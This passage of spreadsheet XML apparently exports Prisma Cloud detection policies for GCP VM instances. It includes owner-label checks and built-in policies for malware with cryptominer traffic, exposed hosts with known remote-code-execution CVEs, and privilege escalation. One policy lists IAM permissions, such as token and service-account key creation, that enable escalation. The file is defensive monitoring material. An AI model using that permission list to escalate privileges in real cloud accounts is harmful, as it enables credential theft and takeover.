      <c r="AK2732" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2733">
      <c r="A2733" t="inlineStr"/>
      <c r="B2733" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2733" s="2" t="inlineStr"/>
      <c r="D2733" t="inlineStr"/>
      <c r="E2733" t="inlineStr"/>
      <c r="F2733" t="inlineStr"/>
      <c r="G2733" t="b">
        <v>0</v>
      </c>
      <c r="H27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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2733" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2733" t="inlineStr">
        <is>
          <t>Adams SNOW GCP VM no CC</t>
        </is>
      </c>
      <c r="L2733" t="inlineStr"/>
      <c r="M2733" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2733" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2733" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2733" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2733" t="inlineStr"/>
      <c r="R2733" t="inlineStr"/>
      <c r="S2733" t="inlineStr">
        <is>
          <t>Autoreplaced,CloudTrail</t>
        </is>
      </c>
      <c r="T2733" t="b">
        <v>0</v>
      </c>
      <c r="U2733" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2733" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2733" t="inlineStr"/>
      <c r="X2733" t="inlineStr"/>
      <c r="Y2733" t="inlineStr"/>
      <c r="Z2733" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-instances-list' AND json.rule = "_DateTime.ageInDays(creationTimestamp) &gt; 7 and labels.owner does not exist" addcolumn creationTimestamp labels.owner</t>
        </is>
      </c>
      <c r="AA2733" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2733" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2733" t="inlineStr"/>
      <c r="AD2733" t="b">
        <v>0</v>
      </c>
      <c r="AE2733" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2733" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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3" t="inlineStr">
        <is>
          <t>bf527c33-ce0c-440a-9f22-450b0bc18424</t>
        </is>
      </c>
      <c r="AI2733" t="inlineStr">
        <is>
          <t>c6c09a99-4b6b-4926-b54c-39ca134de46a</t>
        </is>
      </c>
      <c r="AJ2733" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2733" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2734">
      <c r="A2734" t="inlineStr"/>
      <c r="B2734" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2734" s="2" t="inlineStr"/>
      <c r="D2734" t="inlineStr"/>
      <c r="E2734" t="inlineStr"/>
      <c r="F2734" t="inlineStr"/>
      <c r="G2734" t="b">
        <v>0</v>
      </c>
      <c r="H27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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2734" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2734" t="inlineStr">
        <is>
          <t>tadenugba test gcp account policy1</t>
        </is>
      </c>
      <c r="L2734" t="inlineStr"/>
      <c r="M2734" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2734" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2734" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2734" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2734" t="inlineStr"/>
      <c r="R2734" t="inlineStr"/>
      <c r="S2734" t="inlineStr"/>
      <c r="T2734" t="b">
        <v>0</v>
      </c>
      <c r="U2734" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2734" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2734" t="inlineStr"/>
      <c r="X2734" t="inlineStr"/>
      <c r="Y2734" t="inlineStr"/>
      <c r="Z2734" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.account = 'pcs-gcp-lab01' AND api.name = 'gcloud-compute-instances-list' AND json.rule = tags contains "gke-tadenugba-gke-cluster-2-30b0953e-node"</t>
        </is>
      </c>
      <c r="AA2734" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2734" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2734" t="inlineStr"/>
      <c r="AD2734" t="b">
        <v>0</v>
      </c>
      <c r="AE2734" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2734" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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4" t="inlineStr">
        <is>
          <t>e2d10a2a-0ef8-4538-a7f5-24548a7f7692</t>
        </is>
      </c>
      <c r="AI2734" t="inlineStr">
        <is>
          <t>a2acd177-f555-4ee6-9864-fa592ab0706f</t>
        </is>
      </c>
      <c r="AJ2734" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2734" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2735">
      <c r="A2735" t="inlineStr"/>
      <c r="B2735" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2735" s="2" t="inlineStr"/>
      <c r="D2735" t="inlineStr"/>
      <c r="E2735" t="inlineStr"/>
      <c r="F2735" t="inlineStr"/>
      <c r="G2735" t="b">
        <v>0</v>
      </c>
      <c r="H27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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2735" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2735" t="inlineStr">
        <is>
          <t>GCP VM - 0 Days -  No Owner</t>
        </is>
      </c>
      <c r="L2735" t="inlineStr"/>
      <c r="M2735" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2735" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2735" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2735" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2735" t="inlineStr"/>
      <c r="R2735" t="inlineStr"/>
      <c r="S2735" t="inlineStr"/>
      <c r="T2735" t="b">
        <v>0</v>
      </c>
      <c r="U2735" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2735" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2735" t="inlineStr"/>
      <c r="X2735" t="inlineStr"/>
      <c r="Y2735" t="inlineStr"/>
      <c r="Z2735" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-instances-list' AND json.rule = "labels.owner does not exist" addcolumn creationTimestamp labels.owner</t>
        </is>
      </c>
      <c r="AA2735" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2735" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2735" t="inlineStr"/>
      <c r="AD2735" t="b">
        <v>0</v>
      </c>
      <c r="AE2735" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2735" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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5" t="inlineStr">
        <is>
          <t>a1fbf0a4-c552-4bf3-967f-4942853f2936</t>
        </is>
      </c>
      <c r="AI2735" t="inlineStr">
        <is>
          <t>b9710d6d-25ec-4ff8-b211-6ce1cbff77f7</t>
        </is>
      </c>
      <c r="AJ2735" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2735" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2736">
      <c r="A2736" t="inlineStr"/>
      <c r="B2736" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2736" s="2" t="inlineStr"/>
      <c r="D2736" t="n">
        <v>23</v>
      </c>
      <c r="E2736" t="n">
        <v>6</v>
      </c>
      <c r="F2736" t="n">
        <v>0</v>
      </c>
      <c r="G2736" t="b">
        <v>1</v>
      </c>
      <c r="H27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36" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2736" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2736" t="inlineStr">
        <is>
          <t>PrashanthDigSecurity</t>
        </is>
      </c>
      <c r="L2736" t="inlineStr"/>
      <c r="M2736" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2736" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2736" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2736" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2736" t="inlineStr"/>
      <c r="R2736" t="inlineStr"/>
      <c r="S2736" t="inlineStr"/>
      <c r="T2736" t="b">
        <v>0</v>
      </c>
      <c r="U2736" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2736" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2736" t="inlineStr"/>
      <c r="X2736" t="inlineStr"/>
      <c r="Y2736" t="inlineStr"/>
      <c r="Z2736" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-instances-list' AND json.rule = labels contains "Dig" or labels contains "dig" or tags.items contains "dig" or tags.items contains "Dig"</t>
        </is>
      </c>
      <c r="AA2736" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2736" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2736" t="inlineStr"/>
      <c r="AD2736" t="b">
        <v>0</v>
      </c>
      <c r="AE2736" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2736" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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36" t="inlineStr">
        <is>
          <t>de41b50d-43a0-40fe-9d2c-8b133d662fda</t>
        </is>
      </c>
      <c r="AI2736" t="inlineStr">
        <is>
          <t>656db08b-8d0e-416c-9b3b-17349809bb1c</t>
        </is>
      </c>
      <c r="AJ2736" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2736" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2737">
      <c r="A2737" t="inlineStr"/>
      <c r="B2737" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2737" s="2" t="inlineStr"/>
      <c r="D2737" t="inlineStr"/>
      <c r="E2737" t="inlineStr"/>
      <c r="F2737" t="inlineStr"/>
      <c r="G2737" t="b">
        <v>0</v>
      </c>
      <c r="H27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737" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2737" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2737" t="inlineStr">
        <is>
          <t>DB_AP</t>
        </is>
      </c>
      <c r="L2737" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2737" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2737" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2737" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2737" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2737" t="inlineStr"/>
      <c r="R2737" t="inlineStr"/>
      <c r="S2737" t="inlineStr"/>
      <c r="T2737" t="b">
        <v>0</v>
      </c>
      <c r="U2737" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2737" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2737" t="inlineStr"/>
      <c r="X2737" t="inlineStr"/>
      <c r="Y2737" t="inlineStr"/>
      <c r="Z2737" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'gcloud-compute-instances-list' ) AND finding.name IN ('GCP VM instance with network path from the internet (0.0.0.0/0) on Admin ports') AND with : ( Vuln where id IN ( 'CVE-2024-6387' ) )</t>
        </is>
      </c>
      <c r="AA2737" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2737" t="inlineStr">
        <is>
          <t>2024-09-13 16:49:54</t>
        </is>
      </c>
      <c r="AC2737" t="inlineStr"/>
      <c r="AD2737" t="b">
        <v>0</v>
      </c>
      <c r="AE2737" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2737" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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37" t="inlineStr">
        <is>
          <t>6b4d19bd-ef90-4acb-b46d-f225874ecb9b</t>
        </is>
      </c>
      <c r="AI2737" t="inlineStr">
        <is>
          <t>0de0506b-1de5-4a84-add5-cd1200395c01</t>
        </is>
      </c>
      <c r="AJ2737" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2737" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2738">
      <c r="A2738" t="inlineStr"/>
      <c r="B2738" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2738" s="2" t="inlineStr"/>
      <c r="D2738" t="inlineStr"/>
      <c r="E2738" t="inlineStr"/>
      <c r="F2738" t="inlineStr"/>
      <c r="G2738" t="b">
        <v>0</v>
      </c>
      <c r="H27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738" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2738" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2738" t="inlineStr">
        <is>
          <t>GCP VM - 7 Days -  No Owner (07/01/2024)</t>
        </is>
      </c>
      <c r="L2738" t="inlineStr"/>
      <c r="M2738" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2738" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2738" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2738" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2738" t="inlineStr"/>
      <c r="R2738" t="inlineStr"/>
      <c r="S2738" t="inlineStr"/>
      <c r="T2738" t="b">
        <v>0</v>
      </c>
      <c r="U2738" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2738" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2738" t="inlineStr"/>
      <c r="X2738" t="inlineStr"/>
      <c r="Y2738" t="inlineStr"/>
      <c r="Z2738" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-instances-list' AND resource.status = Active AND json.rule = "_DateTime.ageInDays(creationTimestamp) &gt; 7 and labels does not contain owner and labels does not contain Owner and status does not equal TERMINATED" addcolumn creationTimestamp labels status</t>
        </is>
      </c>
      <c r="AA2738" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2738" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2738" t="inlineStr"/>
      <c r="AD2738" t="b">
        <v>0</v>
      </c>
      <c r="AE2738" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2738" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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38" t="inlineStr">
        <is>
          <t>318fc729-d45b-4edf-ac7a-a2b837011672</t>
        </is>
      </c>
      <c r="AI2738" t="inlineStr">
        <is>
          <t>425a4cb0-d5c1-4f01-be4d-abde55a15c8d</t>
        </is>
      </c>
      <c r="AJ2738" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2738" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2739">
      <c r="A2739" t="inlineStr"/>
      <c r="B2739" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2739" s="2" t="inlineStr"/>
      <c r="D2739" t="inlineStr"/>
      <c r="E2739" t="inlineStr"/>
      <c r="F2739" t="inlineStr"/>
      <c r="G2739" t="b">
        <v>1</v>
      </c>
      <c r="H27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39" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2739" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2739" t="inlineStr">
        <is>
          <t>Potential unauthorized cryptomining activity on GCP VM instance affected by malware</t>
        </is>
      </c>
      <c r="L2739" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,MALWARE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2739" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2739" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2739" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2739" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2739" t="inlineStr"/>
      <c r="R2739" t="inlineStr"/>
      <c r="S2739" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2739" t="b">
        <v>0</v>
      </c>
      <c r="U2739" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2739" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2739" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are affected by malware or grayware and are connected to remote systems known for cryptominer activities.
Cryptominers surreptitiously use a machine's resources to mine cryptocurrencies. The detection of grayware or malware within the GCP VM instance poses a critical security threat, potentially enabling unauthorized access, data compromise, and operational disruption. This intrusion could lead to the exploitation of sensitive information and create pathways for further infiltration across the cloud environment. Moreover, If network connectivity with remote systems known for cryptominer activity is observed on an GCP VM instance, it could indicate that the instance is already under attack or has been compromised.
Immediate attention is required to remediate the malware or grayware reported for the instance as soon as possible and required to investigate cryptominer activity for the GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X2739"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739" t="inlineStr"/>
      <c r="Z2739" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name = (('Host contains Malware' or 'Host contains Grayware') and ('Traffic from a suspicious IP address associated with Cryptominer activity' or 'Traffic to a suspicious IP address associated with Cryptominer activity'))</t>
        </is>
      </c>
      <c r="AA2739" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2739" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:10</t>
        </is>
      </c>
      <c r="AC2739" t="inlineStr"/>
      <c r="AD2739" t="b">
        <v>1</v>
      </c>
      <c r="AE2739" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2739" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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39" t="inlineStr">
        <is>
          <t>33d4123c-45d6-4090-8ccc-8d24fd9a2c58</t>
        </is>
      </c>
      <c r="AI2739" t="inlineStr">
        <is>
          <t>e1c406d4-fbf2-4c4d-98c7-b5957ebc6513</t>
        </is>
      </c>
      <c r="AJ2739" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2739" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2740">
      <c r="A2740" t="inlineStr"/>
      <c r="B2740" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2740" s="2" t="inlineStr"/>
      <c r="D2740" t="n">
        <v>10</v>
      </c>
      <c r="E2740" t="n">
        <v>0</v>
      </c>
      <c r="F2740" t="n">
        <v>0</v>
      </c>
      <c r="G2740" t="b">
        <v>1</v>
      </c>
      <c r="H27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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2740" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2740" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to malware in GCP VM instance with risky IAM write permissions</t>
        </is>
      </c>
      <c r="L2740" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,MALWARE</t>
        </is>
      </c>
      <c r="M2740" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2740" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2740" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2740" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2740" t="inlineStr"/>
      <c r="R2740" t="inlineStr"/>
      <c r="S2740" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2740" t="b">
        <v>0</v>
      </c>
      <c r="U2740" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2740" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2740" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are affected by grayware or malware and have risky IAM write permissions.
The detection of grayware or malware within the instance poses a critical security threat, potentially enabling unauthorized access, data compromise, and operational disruption. This intrusion could lead to the exploitation of sensitive information and create pathways for further infiltration across the cloud environment. The risky IAM write permissions on the instance further help the attackers to escalate their privilege and perform unauthorized actions in the cloud account.
This policy checks for the following risky permissions that could potentially lead to privilege escalation:
'accessapproval.requests.approve', 'accessapproval.requests.dismiss', 'accessapproval.settings.delete', 'accessapproval.settings.update', 'accesscontextmanager.accessLevels.create', 'accesscontextmanager.accessLevels.delete', 'accesscontextmanager.accessLevels.replaceAll', 'accesscontextmanager.accessLevels.update', 'accesscontextmanager.accessPolicies.create', 'accesscontextmanager.accessPolicies.delete', 'accesscontextmanager.accessPolicies.setIamPolicy', 'accesscontextmanager.accessPolicies.update', 'accesscontextmanager.gcpUserAccessBindings.create', 'accesscontextmanager.gcpUserAccessBindings.delete', 'accesscontextmanager.gcpUserAccessBindings.update', 'accesscontextmanager.policies.create', 'accesscontextmanager.policies.delete', 'accesscontextmanager.policies.setIamPolicy', 'accesscontextmanager.policies.update', 'iam.roles.create', 'iam.roles.delete', 'iam.roles.undelete',  'iam.roles.update', 'iam.serviceAccounts.getAccessToken', 'iam.serviceAccountKeys.create', 'iam.serviceAccountKeys.delete', 'iam.serviceAccounts.create', 'iam.serviceAccounts.delete', 'iam.serviceAccounts.disable', 'iam.serviceAccounts.enable', 'iam.serviceAccounts.setIamPolicy', 'iam.serviceAccounts.undelete', 'iam.serviceAccounts.update', 'iam.serviceAccounts.implicitDelegation', 'iam.serviceAccounts.signBlob', 'iam.serviceAccounts.signJwt', 'iam.serviceAccounts.actAs', 'compute.backendServices.setIamPolicy', 'compute.disks.removeResourcePolicies', 'compute.disks.setIamPolicy', 'compute.firewallPolicies.setIamPolicy', 'compute.globalOperations.setIamPolicy', 'compute.images.setIamPolicy', 'compute.instanceTemplates.setIamPolicy', 'compute.instances.removeResourcePolicies', 'compute.instances.setIamPolicy', 'compute.instances.setServiceAccount', 'compute.machineImages.setIamPolicy', 'compute.maintenancePolicies.setIamPolicy', 'compute.snapshots.setIamPolicy'
Immediate attention is required to remediate the malware reported for the instances as soon as possible. Review risky permissions, remove unwanted permissions assigned to the VM instances, and grant only the least privileges required.</t>
        </is>
      </c>
      <c r="X2740" t="inlineStr">
        <is>
          <t>[MALWARE]
Including files flagged as malware in a host filesystem poses significant security risks. It can lead to system infections, data breaches, and application disruptions. Maintain a secure environment by excluding such files from hosts.
[PERMISSION]
Remediation steps:
1. Log in to the GCP console
2. Navigate to the Compute Engine instance 
3. Find the service account used by the Compute Engine instance
4. Navigate to the IAM service
5. Find the binding between the service account used by the Compute Engine instance and the role with risky permissions
6. Remove the binding
7. Create a new binding with predefined or custom role without risky permissions, if necessary.</t>
        </is>
      </c>
      <c r="Y2740" t="inlineStr"/>
      <c r="Z2740" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name = (('GCP Compute Engine with IAM write access level') and ('Host contains Malware' or 'Host contains Grayware'))</t>
        </is>
      </c>
      <c r="AA2740" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2740" t="inlineStr">
        <is>
          <t>2023-12-08 04:25:02</t>
        </is>
      </c>
      <c r="AC2740" t="inlineStr"/>
      <c r="AD2740" t="b">
        <v>1</v>
      </c>
      <c r="AE2740" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2740" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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0" t="inlineStr">
        <is>
          <t>86102dff-5c50-4608-a47e-ec51c09a24bf</t>
        </is>
      </c>
      <c r="AI2740" t="inlineStr">
        <is>
          <t>296cf4a3-ceb6-4211-b84f-275d7539b485</t>
        </is>
      </c>
      <c r="AJ2740" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2740" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2741">
      <c r="A2741" t="inlineStr"/>
      <c r="B2741" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2741" s="2" t="inlineStr"/>
      <c r="D2741" t="inlineStr"/>
      <c r="E2741" t="inlineStr"/>
      <c r="F2741" t="inlineStr"/>
      <c r="G2741" t="b">
        <v>1</v>
      </c>
      <c r="H27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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2741" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2741" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable GCP VM instance [ClamAV, CVE-2023-20032]</t>
        </is>
      </c>
      <c r="L2741" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2741" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2741" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2741" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2741" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2741" t="inlineStr"/>
      <c r="R2741" t="inlineStr"/>
      <c r="S2741" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2741" t="b">
        <v>0</v>
      </c>
      <c r="U2741" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2741" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2741" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable remote code execution vulnerability [CVE-2023-20032].
Remote code execution vulnerability is a critical security concern that enables unauthorized users to execute arbitrary code on a system, potentially leading to data breaches, system compromise, or unauthorized data manipulation. The fact that the GCP VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the ClamAV [CVE-2023-20032] vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X2741"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CVE-2023-20032
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-20032</t>
        </is>
      </c>
      <c r="Y2741" t="inlineStr"/>
      <c r="Z2741" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-20032'))</t>
        </is>
      </c>
      <c r="AA2741" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2741" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2741" t="inlineStr"/>
      <c r="AD2741" t="b">
        <v>1</v>
      </c>
